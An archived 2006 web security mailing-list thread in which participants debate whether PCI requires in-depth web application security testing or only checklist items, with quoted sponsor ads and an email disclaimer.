[WEB SECURITY] RE: MasterCard backs off Security, Leave Cardholders at Risk

Evans, Arian Arian.Evans at fishnetsecurity.com
Thu Jun 8 18:50:44 EDT 2006


> From: Craig Wright [mailto:cwright at bdosyd.com.au] 
> Sent: Thursday, June 08, 2006 5:05 PM
> To: Evans, Arian; webappsec at securityfocus.com
> Subject: RE: MasterCard backs off Security, Leave Cardholders at Risk
> 
> 
> There are levels to the PCI. The high volume clients have to be tested
> in depth. Most have only a simple test.

I understand there are different levels. I read it thoroughly
the other day. I saw nothing like what was said below, namely:
"a full scale in depth web application test as defined in the
PCI Security Audit" or a distinction between "in depth" and
"simple test". I saw checklists that anyone could cover with
roughly ZERO knowledge of webappsec.

Unless I read it wrong, there were two checkboxes, one for
"did they get a web app assessment?" and one for "did they
get some training?", and the additional details required at
various tiers consisted of further controls checkboxes.

Pretty much exactly what I stated in my original response.

So, does PCI have anything concerning webappsec beyond checking
the "they had a webappaudit" |/ and "they had training" |/
boxes, and some general controls (passwords, encryption,
shaken not stirred) requirements?

I guess I should ask our PCI guys, but I figured someone
on this list would/should know off the top of their head.

I'll ask folks who work with this and report back, 

-ae


> -----Original Message-----
> From: Evans, Arian [mailto:Arian.Evans at fishnetsecurity.com]
> 
> Sent: Thursday, 8 June 2006 5:53 AM
> To: webappsec at securityfocus.com
> Subject: RE: MasterCard backs off Security, Leave Cardholders at Risk
> 
> Correct me if I'm wrong, but there is no such thing in PCI
> as "a full scale in depth web application test", as nice
> as that sounds.
> 
> IIRC, it's a generic BITS/Roundtable type checklist, "do
> you have passwords" kind of stuff.
> 
> One of the checklist items is "was an assessment performed
> that evaluated [insert OWASP Top-10]". Another checklist
> item was "are a [smattering] of [software developer types]
> trained on the [insert OWASP Top-10]?"
> 
> This is due diligence. Not a bad thing, to be true, but
> how is a checklist auditor going to know if the group that
> assessed the application knew how to test for blind SQL
> Injection, and timing-based inference (SQL Injection or
> otherwise), let alone buffer overflows, properly encoded
> XSS/script strings, or if they just clicked "scan"?
> 
> That's a huge difference, and far from leaving me with
> a warm fuzzy. I've seen such a huge variance in reports
> from vendors performing webappsec assessments it's shocking
> (or maybe not); at least two were worse than if they'd
> just gotten a commercial webapp scanner and clicked "scan".
> 
> However, it's a start. To be sure. Gotta start somewhere.
> 
> </insert_random_sql_syntax_check></check_requirements_box>
> 
> -ae
> 
> > -----Original Message-----
> > From: fscwi at hotmail.com [mailto:fscwi at hotmail.com]
> 
> > Sent: Wednesday, June 07, 2006 8:58 AM
> > To: webappsec at securityfocus.com
> > Subject: Re: MasterCard backs off Security, Leave 
> Cardholders at Risk
> >
> 
> > This only applies to the requirements for PCI vulnerability
> 
> > scanning.  All applications involved with processing credit
> 
> > card transactions must still undergo a full scale in depth
> 
> > web application test as defined in the PCI Security Audit
> 
> > Standard.  The difference is the web application security
> 
> > test standard states it must be done on an annual basis, and
> 
> > can be done by either an outside vendor or using internal
> 
> > staff.  Vulnerability scanning on the other hand must done on
> 
> > a quarterly basis (for most merchants) by an outside service
> 
> > provider that has been evaluated and approved by MasterCard.
> >
> 
> > --------------------------------------------------------------
> > -----------
> > Sponsored by: Watchfire
> >
> 
> > Watchfire's AppScan is the industry's first and leading web
> 
> > application
> 
> > security testing suite, and the only solution to provide
> 
> > comprehensive
> 
> > remediation tasks at every level of the application. Change
> 
> > the way you
> 
> > think about application security testing - See for yourself.
> 
> > Download a Free Trial of AppScan 6.0 today!
> >
> 
> > https://www.watchfire.com/securearea/appscansix.aspx?id=701300
> > 000007kaF
> > --------------------------------------------------------------
> > ------------
> >
> 
> >
> 
> 
> --------------------------------------------------------------
> ----------
> -
> Sponsored by: Watchfire
> 
> Watchfire's AppScan is the industry's first and leading web 
> application
> 
> security testing suite, and the only solution to provide comprehensive
> 
> remediation tasks at every level of the application. Change 
> the way you
> 
> think about application security testing - See for yourself.
> 
> Download a Free Trial of AppScan 6.0 today!
> 
> https://www.watchfire.com/securearea/appscansix.aspx?id=701300
> 000007kaF
> --------------------------------------------------------------
> ----------
> --
> 
> 
> 
> Liability limited by a scheme approved under Professional 
> Standards Legislation in respect of matters arising within 
> those States and Territories of Australia where such 
> legislation exists.
> 
> DISCLAIMER
> The information contained in this email and any attachments 
> is confidential. If you are not the intended recipient, you 
> must not use or disclose the information. If you have 
> received this email in error, please inform us promptly by 
> reply email or by telephoning +61 2 9286 5555. Please delete 
> the email and destroy any printed copy. 
> 
> 
> Any views expressed in this message are those of the 
> individual sender. You may not rely on this message as advice 
> unless it has been electronically signed by a Partner of BDO 
> or it is subsequently confirmed by letter or fax signed by a 
> Partner of BDO.
> 
> BDO accepts no liability for any damage caused by this email 
> or its attachments due to viruses, interference, 
> interception, corruption or unauthorised access.
> 

----------------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/



More information about the websecurity mailing list